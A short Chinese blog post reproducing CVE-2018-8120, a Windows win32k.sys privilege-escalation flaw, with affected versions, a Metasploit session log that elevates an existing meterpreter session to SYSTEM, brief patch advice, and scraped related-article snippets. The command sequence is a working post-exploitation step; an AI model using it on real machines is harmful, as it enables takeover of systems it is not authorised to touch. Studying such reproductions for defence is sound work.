CVE-2018-8120漏洞复现(提权)
最好用的提权漏洞CVE-2018-8120
漏洞描述
部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码
影响版本
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems ServicePack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1
漏洞复现
当我们通过木马和漏洞攻击拿下一台服务器时,只有普通权限,就要通过提权来获取最高的权限。
meterpreter > getuid 查看当前权限
Server username: TEST\Administrator
meterpreter > background 在后台运行
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search cve-2018-8120 查找漏洞
msf5 exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privesc 利用模块提权
msf5 exploit(windows/local/ms18_8120_win32k_privesc) > set session 1 选择主机
msf5 exploit(windows/local/ms18_8120_win32k_privesc) > run 运行
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM 超级管理员权限
有的系统提权可能会失败。具体要看系统版本。
漏洞修复:
1,在官网下载补丁修复
2,装杀毒软件修复漏洞
CVE-2018-8120漏洞复现(提权)相关推荐
- 米斯特白帽培训讲义(v2)漏洞篇 提权
米斯特白帽培训讲义 漏洞篇 提权 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 提权,顾名思义就是提高自己在服务器中的权限,就比如在 Windows 中你本身登录的用户是 ...
- 米斯特白帽培训讲义 漏洞篇 提权
米斯特白帽培训讲义 漏洞篇 提权 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 提权,顾名思义就是提高自己在服务器中的权限,就比如在 Windows 中你本身登录的用户是 ...
- php backdoor creator encoder,Raven2 渗透(phpmailer漏洞+UDF提权)
本帖最后由 Ybwh 于 2020-7-19 01:05 编辑 本文原创作者Ybwh,本文属i春秋原创奖励计划,未经许可禁止转载! 开机后扫描网段拿到ip地址 clipboard2.png (73.9 ...
- php5.4漏洞解决,php5.4.3的远程代码执行漏洞,提权挺管用
PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令 用这个提权是不是很方便了? // Exploit Title: PHP ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- 《WEB安全渗透测试》(23):记一次利用SSRF漏洞到提权
1.信息收集 对授权目标进行扫描,发现开启了22和80端口,访问web服务. 发现是开源项目,于是下载源码,希望找到有用的信息. 皇天不负有心人,发现疑似用户登录密码的信息,如下所示: 尝试使用adm ...
- Linux系统漏洞本地提权
目录 一.实验项目名称 二.实验目的 三.实验内容 四.实验环境
- 脏牛Linux本地提权漏洞复现(CVE2016-5195)
漏洞介绍: 脏牛漏洞(CVE2016-5195)是公开后影响范围最广和最深的漏洞之一,到2016被修复只十年来的每一个linux版本包括Android,桌面版和服务器版都受其影响.恶意攻击者可以轻易绕 ...
- 谷歌发布 Linux 内核提权漏洞奖励计划,综合奖金最高超30万美元
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 谷歌在博客中表示推出Linux 内核漏洞奖励计划,为其三个月(截止到当地时间2022年1月31日).如研究员能在实验环境中通过已修复漏洞实现提权 ...
最新文章
- 让你的eclipse插件只下载一次
- laravel数据库操作
- hdu2158 最短区间版大家来找碴
- rman datafile恢复(归档模式)
- 低能量社交时代,我们都成了小心翼翼的「舔狗」
- ETC2 区别于ETC的重要点
- Android vector Path Data画图详解
- SQL基础操作_4_表的插入、更新、删除、合并操作
- 经典 HTML5 Javascript 俄罗斯方块游戏
- Python基础【day02】:元组和购物车练习的知识点
- 【Python五篇慢慢弹(5)】类的继承案例解析,python相关知识延伸
- 针对Mysql数据库服务器的优化
- Bailian4071 查找出现了k次的字符【字符串】
- wpf 怎样判断是否选中 checkbox_怎样判断一个人是否缺爱?
- NSString类中三个用于获取子字符串的方法:
- 吴恩达深度学习——机器学习策略(二)
- Poj 1166 The Clocks(bfs)
- 超强的照片无损放大修复工具 SmartDeblur模糊照片变清晰工具
- 企业人脸识别解决方案,让员工考勤更高效
- 如何将word文档转换成电子书?